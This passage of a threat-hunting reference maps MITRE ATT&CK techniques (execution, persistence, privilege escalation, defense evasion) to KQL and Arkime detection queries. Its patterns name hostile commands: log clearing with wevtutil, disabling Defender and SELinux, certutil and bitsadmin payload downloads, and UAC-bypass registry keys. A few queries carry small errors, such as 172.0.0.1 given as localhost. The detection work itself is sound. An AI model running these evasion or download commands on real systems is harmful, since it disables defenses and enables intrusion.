kubernetes.audit.verb: "create" AND kubernetes.audit.objectRef.resource: "pods" AND NOT container.image.name: (*my-private-registry.com*)
ArkimeContainer image pulls from unexpected external endpoints
http.request.uri contains "/v2/" AND http.request.uri contains "/manifests/" AND dns.qry.name contains "docker.io"
T1675

ESXi Administration Command

[MITRE]
Adversaries execute commands directly on VMware ESXi hypervisors via SSH or the host client, allowing them to manipulate, destroy, or backdoor all virtual machines hosted on the hypervisor.
KQLESXi Syslog โ€” SSH logins and esxcli execution
event.dataset: "vmware.esxi" AND (process.name: "esxcli" OR message: "Accepted password for root from")
ArkimeSSH/Web UI traffic to ESXi hosts from unusual subnets
ip.dst == [ESXi_Host_IP] AND (tcp.port == 22 OR tcp.port == 443)
T1203

Exploitation for Client Execution

[MITRE]
Adversaries exploit vulnerabilities in client applications (Office, browsers, PDF readers) to execute malicious code, typically requiring a user to open a crafted file or visit a malicious webpage.
KQLSysmon โ€” document reader spawning a shell (successful exploit)
process.parent.name: ("AcroRd32.exe" OR "Acrobat.exe" OR "FoxitReader.exe" OR "WINWORD.EXE") AND process.name: ("cmd.exe" OR "powershell.exe" OR "certutil.exe" OR "rundll32.exe")
ArkimePDF with embedded JavaScript served over HTTP
http.response.headers.content_type == "application/pdf" AND http.response.body contains "/JS" AND http.response.body contains "/JavaScript"
T1674

Input Injection

[MITRE]
Adversaries simulate user input (keystrokes, mouse movements) using OS APIs like SendKeys to execute commands, bypassing UI restrictions or interacting with UAC prompts without needing a shell.
KQLPS Script Block โ€” SendKeys API usage for keystroke injection
winlog.event_id: 4104 AND powershell.file.script_block_text: ("*System.Windows.Forms.SendKeys*" OR "*SendWait*")
T1677

Poisoned Pipeline Execution

[MITRE]
Adversaries compromise CI/CD environments (GitHub Actions, Jenkins, GitLab) and modify build pipelines so that when a developer pushes code, the pipeline automatically executes the adversary's malicious code.
KQLAuditbeat โ€” unauthorized changes to CI/CD pipeline config files
event.action: "file_modified" AND file.path: ("*.github/workflows*" OR "*Jenkinsfile*" OR "*.gitlab-ci.yml")
ArkimeBuild runner making anomalous outbound connections (reverse shell/payload download)
ip.src == [Build_Runner_IP] AND NOT tls.handshake.extensions_server_name matches "(github|gitlab|docker|aws)"
T1648

Serverless Execution

[MITRE]
Adversaries execute code in serverless environments (AWS Lambda, Azure Functions) which run outside standard VM monitoring, making them blind spots for traditional EDR โ€” often abused for cryptomining or attack proxying.
KQLCloudTrail โ€” Lambda function creation/update from non-CI/CD accounts
event.dataset: "aws.cloudtrail" AND event.action: ("CreateFunction" OR "UpdateFunctionCode" OR "Invoke") AND event.provider: "lambda.amazonaws.com"
T1129

Shared Modules

[MITRE]
Adversaries load malicious payloads via shared libraries (DLLs on Windows, SOs on Linux). By injecting or forcing a legitimate program to load a malicious DLL, execution blends in with trusted processes.
KQLSysmon โ€” native tools executing DLLs from user-writable directories
process.name: ("rundll32.exe" OR "regsvr32.exe") AND process.command_line: ("*AppData*" OR "*Temp*" OR "*ProgramData*")
T1072

Software Deployment Tools

[MITRE]
Adversaries compromise enterprise deployment tools (SCCM, Intune, Ansible, PDQ Deploy) to distribute malware or run commands across the entire network simultaneously, turning IT tools into a weapon.
KQLSysmon โ€” SCCM/Intune agents executing suspicious shells
process.parent.name: ("CcmExec.exe" OR "IntuneManagementExtension.exe") AND process.name: ("powershell.exe" OR "cmd.exe" OR "wscript.exe")
ArkimeLarge binary transfers from deployment servers during off-hours
ip.src == [SCCM_Server_IP] AND tcp.len > 5000000
Persistence TA0003
Techniques adversaries use to keep access to systems across restarts, credential changes, and other interruptions.
T1037

Boot or Logon Initialization Scripts

[MITRE]
KQLRegistry modification adding logon script (UserInitMprLogonScript)
event.code: 4688 AND process.command_line: "regadd\EnvironmentUserInitMprLogonScript"
KQLT1037.001 โ€” Registry events for logon script path
event.code: (4657 OR 4656) AND registry.path: "*/\Environment/\UserInitMprLogonScript"
process.name: reg.exe AND process.command_line: *UserInitMprLogonScript*
event.code: (12 OR 13 OR 14) AND *UserInitMprLogonScript*
T1053

Scheduled Task/Job (Persistence)

[MITRE]
KQLScheduled task event IDs โ€” creation, enable, disable, modify, delete
event.code: (4698 OR 4700 OR 4701 OR 4702 OR 4699)
  4698: Task created | 4700: Enabled | 4701: Disabled | 4702: Modified | 4699: Deleted
KQLProcess creating a scheduled task
process.name: schtasks* AND process.command_line: *create*
process.name: ("schtasks.exe" OR "at.exe" OR "Taskeng.exe" OR "cron" OR "crontab")
KQLschtasks.exe โ€” check parent process, working dir, output location, user context
process.name: schtasks.exe
T1098

Account Manipulation

[MITRE]
KQLPrivileged account password reset remotely (persistence indicator)
event.action: "logged-in" AND event.outcome: "success" AND source.ip != null AND NOT source.ip: (172.0.0.1 OR "::1") AND (winlog.event_data.TargetUserName: (*Admin* OR *super* OR *SVC* OR *DC0* OR *service* OR *DMZ* OR *ADM*))
KQLAccount modification event IDs
event.code: (4738 OR 4728)
  4738: User account changed | 4728: Member added to security-enabled global group
InfoAlso monitor changes to SSH authorized_keys or /etc/ssh/sshd_config on Linux systems
/etc/ssh/sshd_config
~/.ssh/authorized_keys
T1136

Account Creation

[MITRE]
KQLNew user account created (Windows event 4720)
event.code: 4720
KQLAccount created via net user /add command
process.name: net.exe AND process.args: user AND process.args: /add
adduser OR useradd   -- Linux
T1197

BITS Jobs

[MITRE]

Why they do it: Background Intelligent Transfer Service (BITS) can be abused to download payloads or execute programs while evading detection, since it uses Windows native functionality.

KQLbitsadmin.exe usage โ€” downloading and transferring files
process.name: bitsadmin.exe
process.name: bitsadmin.exe AND process.command_line: (*transfer* AND *Download*)
bitsadmin AND (Transfer OR Create OR AddFile OR SetNotifyFlags OR SetNotifyCmdLine OR SetMinRetryDelay OR SetCustomHeaders OR Resume)
KQLPowerShell BITS transfer (Start-BitsTransfer)
powershell AND Start-BitsTransfer
process.name: bitsadmin.exe OR ((process.name: powershell.exe OR pwsh.exe) AND process.command_line: (*payload* OR *autoruns*))
KQLBITS event IDs (requires Sysmon) โ€” job created, updated, deleted
event.code: (59 OR 60 OR 61)
  59: BITS job created | 60: BITS job updated | 61: BITS job deleted
T1505.003

Web Shell

[MITRE]

Why they do it: Adversaries install backdoor scripts on web servers. Web shells provide persistent access and a command interface on the web-hosting system.

KQLWeb server process spawning shells (web shell execution)
event.type: "start" AND process.parent.name: ("w3wp.exe" OR "httpd.exe" OR "nginx.exe" OR "php.exe" OR "php-cgi.exe" OR "tomcat.exe") AND process.name: ("cmd.exe" OR "cscript.exe" OR "powershell.exe" OR "pwsh.exe" OR "wmic.exe" OR "wscript.exe")
KQLBroad web shell detection โ€” known recon/admin tools with web server parent
process.name: ("arp.exe" OR "at.exe" OR "certutil.exe" OR "cmd.exe" OR "cscript.exe" OR "dsquery.exe" OR "find.exe" OR "findstr.exe" OR "hostname.exe" OR "ipconfig.exe" OR "net.exe" OR "net1.exe" OR "netsh.exe" OR "netstat.exe" OR "nltest.exe" OR "nslookup.exe" OR "ping.exe" OR "powershell.exe" OR "reg.exe" OR "rundll32.exe" OR "sc.exe" OR "schtasks.exe" OR "systeminfo.exe" OR "tasklist.exe" OR "whoami.exe" OR "wmic.exe" OR "wscript.exe") AND process.parent.name: ("w3wp.exe" OR "httpd.exe" OR "nginx.exe" OR "php.exe" OR "tomcat.exe")
T1546

Event Triggered Execution

[MITRE]
KQLCOM object hijacking via registry โ€” scrobj.dll loaded into HKCU
(registry.path: "HK*}\\InprocServer32\" AND registry.data.strings: ("scrobj.dll" OR "C:\\*\\scrobj.dll")) OR (registry.path: ("HKEY_USERS\\*Classes\\*\\InprocXServer32\" OR "HKEY_USERS\\*Classes\\*\\LocalServer32\" OR "HKEY_USERS\\*Classes\\*\\DelegateExecute\") AND user.domain != "NT AUTHORITY")
KQLWMI event subscription abuse (ActiveScriptEventConsumer)
event.type: ("start" OR "process_started") AND process.name: "wmic.exe" AND process.args: "create" AND process.args: ("ActiveScriptEventConsumer" OR "CommandLineEventConsumer")
T1547.001

Boot/Logon Autostart: Registry Run Keys / Startup Folder

[MITRE]
KQLRegistry Run key modifications โ€” common persistence locations
event.code: (4657 OR 4670)
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
InfoStartup folder paths for current user and all users
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
T1547.005

Security Support Provider

[MITRE]
KQLSSP registry key modifications โ€” new SSPs loaded at next boot
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages"
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages"
event.code: (4657 OR 4688) AND process.command_line: (*reg.exe* AND *Lsa*)
T1543.003

Create or Modify System Process: Windows Service

[MITRE]
KQLCobalt Strike persistence โ€” registers itself as Windows service via storesyncsvc.dll
storesyncsvc.dll
T1574.001

Hijack Execution Flow: DLL Search Order Hijacking

[MITRE]
KQLUntrusted DLLs being loaded by common executables
(event.category: "library" OR (event.category: "process" AND event.action: "Image loaded*")) AND dll.name: ("wlbsctrl.dll" OR "wbemcomn.dll" OR "WptsExtensions.dll" OR "wow64log.dll" OR "WindowsCoreDeviceInfo.dll" OR "Ualapi.dll" OR "wlanhlp.dll" OR "phoneinfo.dll" OR "EdgeGdi.dll" OR "cdpsgshims.dll") AND (dll.code_signature.trusted: false OR dll.code_signature.exists: false)
KQLOffice/browser apps writing DLLs to AppData (DLL planting)
Image: (*\\winword.exe OR *\\excel.exe OR *\\powerpnt.exe OR *\\cmd.exe OR *\\certutil.exe OR *\\mshta.exe OR *\\curl.exe OR *\\powershell.exe OR *\\pwsh.exe) AND TargetFilename: *.dll AND TargetFilename: (*\\Users\\* AND *\\AppData\\*)
T1037.001

Boot/Logon Init Scripts: Logon Script (Windows)

[MITRE]
Adversaries set a logon script via the UserInitMprLogonScript registry key to execute code whenever a user logs on, achieving persistence under the user's context.
KQLRegistry access/modification to UserInitMprLogonScript key
event.code: (4657 OR 4656) AND registry.path: *UserInitMprLogonScript*
KQLreg.exe or Sysmon registry events touching logon script key
process.name: reg.exe AND process.command_line: *UserInitMprLogonScript*
event.code: (12 OR 13 OR 14) AND winlog.event_data.TargetObject: *UserInitMprLogonScript*
T1053.005

Scheduled Task/Job: Scheduled Task

[MITRE]
Adversaries create scheduled tasks to maintain persistence โ€” tasks execute at login, system start, or intervals. Often configured to run as SYSTEM for elevated access.
KQLschtasks.exe execution โ€” inspect parent, working dir, output, user context
process.name: schtasks.exe
event.code: 4698
-- 4698: Scheduled task created โ€” check task XML for Run As user and action
T1671

Cloud Application Integration

[MITRE]
Adversaries maintain cloud persistence by granting malicious OAuth applications access to user data (Consent Phishing). Even after password resets, the OAuth token retains API access to email, files, and other resources.
KQLAzure AD โ€” OAuth consent grants and high-privilege app roles
event.dataset: "azure.auditlogs" AND event.action: ("Consent to application" OR "Add app role assignment to service principal" OR "Add service principal")
T1554

Compromise Host Software Binary

[MITRE]
Adversaries modify or patch legitimate software binaries (backdooring sshd, common system executables) to embed persistence mechanisms directly into trusted software that survives reinstalls.
KQLAuditbeat FIM โ€” modifications to critical native binaries or PAM modules
event.module: "file_integrity" AND event.action: ("attributes_modified" OR "created" OR "updated") AND file.path: ("/usr/sbin/sshd" OR "/bin/login" OR "/lib/security/pam_unix.so")
T1668

Exclusive Control

[MITRE]
Adversaries lock files or resources exclusively to prevent defenders, AV, or EDR from reading, analyzing, or deleting malicious persistence mechanisms.
KQLEDR โ€” processes acquiring exclusive file locks to prevent deletion
event.category: "file" AND event.action: "file_lock" AND process.name: ("powershell.exe" OR "cmd.exe" OR "*.tmp.exe")
T1133

External Remote Services (Persistence)

[MITRE]
For persistence, adversaries install stealthy remote access tools (Ngrok tunnels, AnyDesk, unauthorized VPN agents) or enable RDP on compromised systems to guarantee re-entry from the internet if their primary C2 is blocked.
KQLSysmon โ€” RMM tools used as persistent backdoors
process.name: ("ngrok.exe" OR "AnyDesk.exe" OR "TeamViewer_Service.exe" OR "screenconnect.exe" OR "meshagent.exe")
ArkimePersistent outbound tunnels to RMM infrastructure
tls.handshake.extensions_server_name contains "ngrok.io" OR dns.qry.name contains "anydesk.com"
T1525

Implant Internal Image

[MITRE]
Adversaries backdoor golden images, VM templates, or container base images so every newly deployed server is instantly compromised โ€” persistence that survives reimages and auto-scaling events.
KQLCloudTrail โ€” unauthorized AMI modification or registration
event.dataset: "aws.cloudtrail" AND event.action: ("ModifyImageAttribute" OR "RegisterImage" OR "CreateImage") AND NOT user.name: "*automation-role*"
T1556

Modify Authentication Process

[MITRE]
Adversaries patch authentication mechanisms (Windows LSASS, Linux PAM, Skeleton Key malware on DCs) to accept a backdoor password for any account, enabling login as any user without knowing their real password.
KQLSysmon โ€” suspicious access/injection into LSASS
winlog.event_id: (10 OR 8) AND winlog.event_data.TargetImage: "*\\lsass.exe" AND NOT process.executable: ("*\\System32\\svchost.exe" OR "*\\Antivirus.exe")
KQLLinux FIM โ€” PAM module modifications
event.module: "file_integrity" AND event.action: ("updated" OR "created") AND file.path: "/etc/pam.d/*"
T1112

Modify Registry (Persistence)

[MITRE]
Adversaries abuse the Windows Registry to store fileless payloads, configure autorun entries, or disable security tools โ€” enabling persistence that survives reboots without writing files to disk.
KQLSysmon โ€” registry modifications to Run keys or security policy
process.name: ("reg.exe" OR "powershell.exe") AND process.command_line: ("* add *" OR "*Set-ItemProperty*") AND process.command_line: ("*CurrentVersion\\Run*" OR "*Windows Defender*")
T1137

Office Application Startup

[MITRE]
Adversaries leverage Office startup features โ€” modifying Normal.dotm, installing XLL/WLL add-ins, or creating Outlook rules โ€” to execute malware every time a user opens Word, Excel, or Outlook.
KQLSysmon โ€” files written to Office Add-in or Startup directories
winlog.event_id: 11 AND file.path: ("*\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" OR "*\\AppData\\Roaming\\Microsoft\\AddIns\\*") AND file.extension: ("dotm" OR "wll" OR "xll" OR "xla")
KQLSysmon Registry โ€” malicious Outlook rules
winlog.event_id: (12 OR 13) AND registry.path: "*\\Software\\Microsoft\\Office\\*\\Outlook\\Profiles\\*\\Rule*"
T1653

Power Settings

[MITRE]
Adversaries modify power settings to prevent sleep/hibernation, ensuring persistent C2 connections are never interrupted by power-saving modes that would drop network connections.
KQLSysmon โ€” powercfg disabling sleep or hibernate
process.name: "powercfg.exe" AND process.command_line: ("* /change *" OR "* -x *") AND process.command_line: ("*standby-timeout-ac 0*" OR "*hibernate-timeout-ac 0*")
T1542

Pre-OS Boot

[MITRE]
Adversaries infect BIOS/UEFI/Boot Records (Bootkits) to persist below the OS โ€” executing before the OS loads, bypassing AV/EDR, and surviving complete OS reinstalls or hard drive wipes.
KQLSysmon โ€” EFI partition mounting (bootkit staging)
process.name: "mountvol.exe" AND process.command_line: "* /S"
KQLSysmon โ€” BCD modifications to disable Driver Signature Enforcement
process.name: "bcdedit.exe" AND process.command_line: ("*set loadoptions DDISABLE_INTEGRITY_CHECKS*" OR "*set testsigning on*")
T1176

Browser Extensions

[MITRE]
Adversaries deploy malicious browser extensions (Chrome, Edge, Firefox) to persist inside the browser โ€” enabling session cookie theft, MFA bypass, webmail reading, or script injection into trusted websites.
KQLSysmon โ€” browsers launched with --load-extension flag
process.name: ("chrome.exe" OR "msedge.exe") AND process.command_line: "*--load-extension=*"
KQLSysmon โ€” unknown extension manifest.json dropped to browser extension dir
winlog.event_id: 11 AND file.path: "*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*" AND file.name: "manifest.json"
T1205

Traffic Signaling

[MITRE]
Adversaries use Port Knocking or Magic Packets โ€” the backdoor stays completely silent until it receives a secret sequence of packets, then opens a port or initiates C2, making it invisible to port scanners.
KQLLinux โ€” BPF/raw socket listeners on endpoints
process.name: ("tcpdump" OR "bpftool") AND NOT user.name: "root"
ArkimePort knocking โ€” rapid SYN packets to non-listening ports
(tcp.flags.syn == 1 AND tcp.flags.ack == 0) AND tcp.dstport > 10000
T1078

Valid Accounts (Persistence)

[MITRE]
For persistence, adversaries reset dormant account passwords, set passwords to never expire, enable disabled accounts, or generate long-lived cloud API keys to ensure continued access even after incident response.
KQLWindows โ€” disabled accounts re-enabled or password-never-expires set
winlog.event_id: (4722 OR 4738) AND (winlog.event_data.UserAccountControl: "*Password Never Expires*" OR winlog.event_id: 4722)
KQLCloudTrail โ€” persistent IAM access key creation
event.dataset: "aws.cloudtrail" AND event.action: "CreateAccessKey"
Privilege Escalation TA0004
Techniques adversaries use to gain higher-level permissions on a system or network. Often uses the same mechanisms as Persistence.
T1055

Process Injection

[MITRE]
KQLEXE/DLL access, creation, or installation events linked to injection
event.type: ("access" OR "creation" OR "installation") AND file.extension: ("exe" OR "dll") AND event.code: ("7" OR "3" OR "560")
  Code 7: Process Creation | Code 3: File Creation | Code 560: Object Access
T1546.010

Event Triggered Execution: AppInit DLLs

[MITRE]
KQLAppInit_DLLs registry key modification
registry.path: ("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls" OR "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls") AND NOT process.executable: ("C:\\Windows\\System32\\msiexec.exe" OR "C:\\Windows\\SysWOW64\\msiexec.exe")
registry.path: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs
RegCreateKeyEx OR RegSetValueEx
KQLProcess creation following AppInit DLL load
event.code: 4688
T1547.009

Shortcut Modification

[MITRE]
KQLLNK file creation or modification, registry changes to .lnk file extension
event.code: (4656 OR 4663)   -- File creation / object access
event.code: 4657 AND registry.path: "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lnk"
T1548.002

Abuse Elevation Control: Bypass UAC

[MITRE]
KQLeventvwr.exe UAC bypass โ€” check related user and hostname
process.name: eventvwr.exe AND registry.key: HKCU\Software\Classes\mscfile\shell\open\command
process.name: sdclt.exe AND registry.key: HKCU\Software\Microsoft\Windows\CurrentVersion\AppPaths\control.exe
KQLMSI spawning cmd/powershell (UAC bypass via installer)
event.code: 1 AND process.name: (cmd.exe OR powershell.exe OR pwsh.exe) AND process.parent.name: (*Installer* AND *msi* AND *tmp)
T1037.001

Boot/Logon Init Scripts: Logon Script (Windows)

[MITRE]
KQLRegistry path for logon script (UserInitMprLogonScript)
event.code: (4657 OR 4656) AND registry.path: "*/\Environment/\UserInitMprLogonScript"
process.name: reg.exe AND process.command_line: *UserInitMprLogonScript*
T1098

Account Manipulation (Privilege Escalation)

[MITRE]
KQLAccount modification event IDs โ€” user changed, group membership changes
event.code: (4738 OR 4728)
  4738: User account changed | 4728: Member added to security-enabled global group
T1053

Scheduled Task/Job

[MITRE]
Adversaries abuse task scheduling to execute malicious code as a higher-privileged user. Scheduled tasks can run as SYSTEM or other elevated accounts, granting privilege escalation.
KQLScheduled task creation โ€” check user context for privilege escalation (running as SYSTEM)
process.name: schtasks.exe AND process.command_line: */create*
event.code: 4698
-- Verify: is the task configured to run as NT AUTHORITY\SYSTEM or other elevated account?
KQLTaskScheduler process creation with create/change/delete args
event.type: "process_start" AND process.name: "TaskScheduler.exe" AND process.command_line: (* /Create * OR * /Change * OR * /Delete *)
T1574.001

Hijack Execution Flow: DLL Search Order Hijacking

[MITRE]
Adversaries place malicious DLLs in directories searched before the legitimate DLL location, causing privileged processes to load attacker-controlled code and elevate privileges.
KQLUnsigned or untrusted DLL load of commonly hijacked DLL names
(event.category: "library" OR (event.category: "process" AND event.action: "Image loaded*")) AND
(dll.name: ("wlbsctrl.dll" OR "wbemcomn.dll" OR "WptsExtensions.dll" OR "wow64log.dll" OR
            "WindowsCoreDeviceInfo.dll" OR "Ualapi.dll" OR "wlanhlp.dll" OR "phoneinfo.dll" OR
            "EdgeGdi.dll" OR "cdpsgshims.dll" OR "diagtrack_win.dll") AND
 (dll.code_signature.trusted: false OR dll.code_signature.exists: false))
T1134

Access Token Manipulation

[MITRE]
Adversaries steal, duplicate, or impersonate Windows access tokens of higher-privileged processes (SYSTEM, Domain Admin) using tools like Cobalt Strike's make_token or Incognito โ€” gaining elevated access without needing a password.
KQLWindows โ€” Logon Type 9 (NewCredentials) used for token impersonation
winlog.event_id: 4624 AND winlog.logon.type: 9 AND event.outcome: "success"
T1543

Create or Modify System Process (Privilege Escalation)

[MITRE]
When a vulnerable service runs as SYSTEM, adversaries replace its binary or modify its binPath. On restart, their malware executes as SYSTEM, achieving privilege escalation via DLL hijacking or service misconfiguration.
KQLWindows โ€” sc.exe modifying existing service binary path
process.name: ("sc.exe" OR "powershell.exe") AND process.command_line: "* config *" AND process.command_line: "* binPath= *"
T1484

Domain or Tenant Policy Modification

[MITRE]
Adversaries escalate across entire domains by modifying GPOs to push local admin accounts to all workstations, or modify Azure AD Conditional Access policies to exclude backdoor accounts from MFA.
KQLWindows โ€” GPO modifications on Domain Controller SYSVOL
winlog.event_id: 5145 AND winlog.event_data.ShareName: "*\\SYSVOL*" AND winlog.event_data.RelativeTargetName: "*\\Policies\\*\\GPT.ini" AND winlog.event_data.AccessMask: "0x2"
KQLAzure โ€” Conditional Access policy tampering
event.dataset: "azure.auditlogs" AND event.action: ("Update policy" OR "Delete policy") AND event.category: "Policy"
T1611

Escape to Host

[MITRE]
Adversaries escape container isolation (Docker/K8s) to gain root on the underlying host, exploiting --privileged containers, mounted host filesystems, or access to the Docker socket (/var/run/docker.sock).
KQLLinux โ€” chroot or nsenter used to break into host namespace
process.name: ("chroot" OR "nsenter") AND process.command_line: ("*/host*" OR "*-t 1 -m -u -n -i*")
T1068

Exploitation for Privilege Escalation

[MITRE]
Adversaries exploit kernel, driver, or privileged service vulnerabilities (PrintNightmare, PrintSpoofer, ZeroLogon) to elevate from standard user to SYSTEM/root without stealing credentials.
KQLSysmon โ€” Print Spooler spawning interactive shell (PrintNightmare)
process.parent.name: "spoolsv.exe" AND process.name: ("cmd.exe" OR "powershell.exe" OR "rundll32.exe" OR "whoami.exe")
KQLSysmon โ€” vulnerable drivers loaded from user-writable paths (BYOVD)
winlog.event_id: 6 AND file.path: ("*\\Temp\\*.sys" OR "*\\AppData\\*.sys" OR "*\\Users\\Public\\*.sys")
T1078

Valid Accounts (Privilege Escalation)

[MITRE]
The simplest privilege escalation โ€” finding credentials for an already-privileged account (in cleartext scripts, wikis, or via credential dumping) and logging in directly. "Why exploit when you can log in?"
KQLWindows โ€” runas.exe used to execute under admin context
process.name: "runas.exe" AND process.command_line: "* /user:*" AND (process.command_line: "*admin*" OR process.command_line: "*root*")
Defense Evasion TA0005
Techniques adversaries use to avoid detection. Includes a wide range of techniques to avoid security tools, clear evidence of their presence, and blend into normal activity.
T1027

Obfuscated Files or Information

[MITRE]
KQLBase64-encoded command lines in PowerShell or CMD
process.name: (powershell.exe OR cmd.exe) AND process.command_line: *base64*
process.name: powershell.exe AND process.command_line: (*-ec* OR *-e* OR *-en*)
process.name: cmd.exe AND process.command_line: (*\^* OR *\=* OR *\%* OR *\!* OR *\[* OR *\(* OR *\;*)
KQLKnown packers/compressors โ€” UPX, MPRESS, morphine
process.name: (upx.exe OR mpress.exe OR exepacker.exe OR morphine.exe)
T1036

Masquerading

[MITRE]
KQLforfiles.exe invoked from non-default location to spawn cmd (masquerading)
((ParentCommandLine: (*.exe OR *.exe")) AND Image: *\\cmd.exe AND CommandLine: \/c\ echo\ "*) AND NOT ((ParentImage: (*\:\\Windows\\System32\\* OR *\:\\Windows\\SysWOW64\\*)) AND ParentImage: *\\forfiles.exe AND Image: *\\cmd.exe)
T1070

Indicator Removal on Host

[MITRE]
KQLPowerShell history cleared (console history removal)
event.action: "start" AND process.name: (powershell.exe OR pwsh.exe OR powershell_ise.exe) AND (process.args: "*Clear-History*" OR (process.args: ("*Remove-Item*" OR *rm) AND process.args: ("*ConsoleHost_history.txt*" OR "*(Get-PSReadlineOption).HistorySavePath*")))
KQLEventLog disabled via logman, PowerShell, or auditpol
event.type: ("start" OR "process_started") AND ((process.name: "logman.exe") AND process.args: "EventLog-*" AND process.args: ("stop" OR "delete")) OR (process.name: ("powershell.exe") AND process.args: "Set-Service" AND process.args: "EventLog" AND process.args: "Disabled") OR (process.name: "auditpol.exe" AND process.args: "/success:disable")
KQLT1070.001 โ€” Event log cleared (event 1102 or wevtutil)
event.code: 1102 OR event.action: "Log clear"
"wevutil cl"
process.name: wevtutil.exe AND process.args: (cl OR clear-log OR set-log OR sl OR lfn)
event.category: process AND event.type: (start OR process_started) AND process.name: wevtutil.exe AND process.args: cl
KQLT1070.004 โ€” File deletion using sdelete or Remove-Item
process.name: (sdelete64.exe OR sdelete.exe)
process.name: (del.exe OR rmdir.exe)
process.name: powershell.exe AND process.command_line: *Remove-Item*
T1112

Modify Registry

[MITRE]
KQLSuspicious registry modifications to Run keys
process.name: "reg.exe" AND process.args: ("add" OR "set" OR "delete") AND (process.args: "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*" OR process.args: "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce*")
InfoKey registry paths commonly targeted by adversaries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
T1140

Deobfuscate/Decode Files or Information

[MITRE]
KQLCertUtil used for encoding/decoding โ€” common LOLBin abuse
process.name: certutil.exe AND process.command_line: (*decode* OR *urlcache* OR *encode* OR *encodehex* OR *decodehex* OR *exportPFX*)
host.os.type: "windows" AND event.type: "start" AND process.name: "certutil.exe"
KQLReflective PE injection via PowerShell
event.id: 1 AND command.line: "*Invoke-ReflectivePEInjection*"
KQLArchive/compression tools used to decode payloads
process.name: (zip* OR rar* OR 7zip* OR winzip* OR winrar* OR ziparchiver* OR peazip*)
T1218

System Binary Proxy Execution

[MITRE]
KQLmshta.exe with incoming network connection (DCOM/HTA lateral movement)
event.type: "start" AND process.name: "mshta.exe" AND network.direction: "incoming" AND network.transport: "tcp" AND source.port > 49151 AND destination.port > 49151 AND NOT source.address: ("127.0.0.1" OR "::1")
KQLT1218.001 CHM โ€” hh.exe loading .chm file
process.name: hh.exe AND process.command_line: *.chm*
KQLT1218.011 Rundll32 โ€” possibly executing malicious DLLs or JavaScript
process.name: rundll32.exe AND process.command_line: *Start*
process.name: rundll32.exe AND process.command_line: *javascript*
process.name: rundll32.exe   -- broad, may have many hits; triage by parent/user
T1562

Impair Defenses

[MITRE]
KQLDisabling PowerShell Script Block Logging via registry
event.type: "change" AND registry.path: "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging" AND registry.data.strings: ("0", "0x00000000")
KQLT1562.001 โ€” Windows Defender disabled via sc.exe
event.code: 4688 AND process.name: sc.exe AND process.args: (config OR stop OR query)
event.code: 7036 AND (("Windows Defender" OR "Windows Firewall") AND "stopped")
KQLDefender disabled via PowerShell or registry
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" AND "DisableAntiSpy"
powershell AND Set-ItemProperty AND "Windows Defender" AND DisableAntiSpyware
"MpCmdRun" AND "RevertPlatform"
KQLSet-MpPreference disabling script scanning (Windows AV evasion)
"Set-MpPreference -DisableScriptScanning"   -- Windows
"setenforce 0"                               -- Linux (disables SELinux)
T1564

Hide Artifacts

[MITRE]
KQLAlternate Data Stream creation on common file types
event.type: "creation" AND file.path: "C:\\*:*" AND NOT file.path: "C:\\*:zone.identifier*" AND file.extension: ("pdf" OR "dll" OR "png" OR "exe" OR "dat" OR "com" OR "bat" OR "cmd" OR "sys" OR "vbs" OR "ps1" OR "hta" OR "txt" OR "js" OR "docx" OR "doc" OR "xlsx" OR "xls")
KQLT1564.001 โ€” Hidden files and directories via registry
process.name: reg.exe AND process.command_line: (*ShowSuperHidden* OR *Hidden*)
registry.path: (*Hidden* OR *hidden*)
T1599

Network Boundary Bridging

[MITRE]

What to look for: Unauthorized configuration changes, new routes added, anomalous connections between enclaves that shouldn't communicate.

InfoManual review checklist for network boundary bridging
- Review firewall rules for unauthorized changes
- Check router settings for newly added/modified routes
- Look for traffic between networks that shouldn't communicate
- Monitor unusually high traffic volumes on specific ports
- View traffic flowing in/out from boundary devices
- Monitor for unauthorized communication between enclaves
T1055

Process Injection

[MITRE]
Adversaries inject code into processes to evade process-based defenses and potentially elevate privileges. Malicious code may be run under a legitimate process to blend into normal activity. (Also see Privilege Escalation.)
KQLSysmon Ev10: Process access (common for injection โ€” OpenProcess with PROCESS_VM_WRITE)
event.code: 10 AND winlog.event_data.GrantedAccess: ("0x1fffff" OR "0x1f1fff" OR "0x143a" OR "0x40" OR "0x1000")
event.code: 10 AND target.process.name: (lsass.exe OR svchost.exe OR explorer.exe)
KQLUnusual parent-child relationships indicating process hollowing or injection
process.parent.name: (svchost.exe OR services.exe) AND process.name: (cmd.exe OR powershell.exe OR wscript.exe OR cscript.exe)
T1197

BITS Jobs

[MITRE]
Adversaries abuse Windows Background Intelligent Transfer Service (BITS) to download payloads, persist, or execute commands while evading detection โ€” BITS jobs survive reboots and run as a trusted Windows service. (Also see Persistence.)
KQLBITSAdmin download/transfer โ€” primary LOLBin abuse for evasion
process.name: bitsadmin.exe AND process.command_line: (*transfer* AND *Download*)
process.name: bitsadmin.exe AND process.command_line: *transfer*
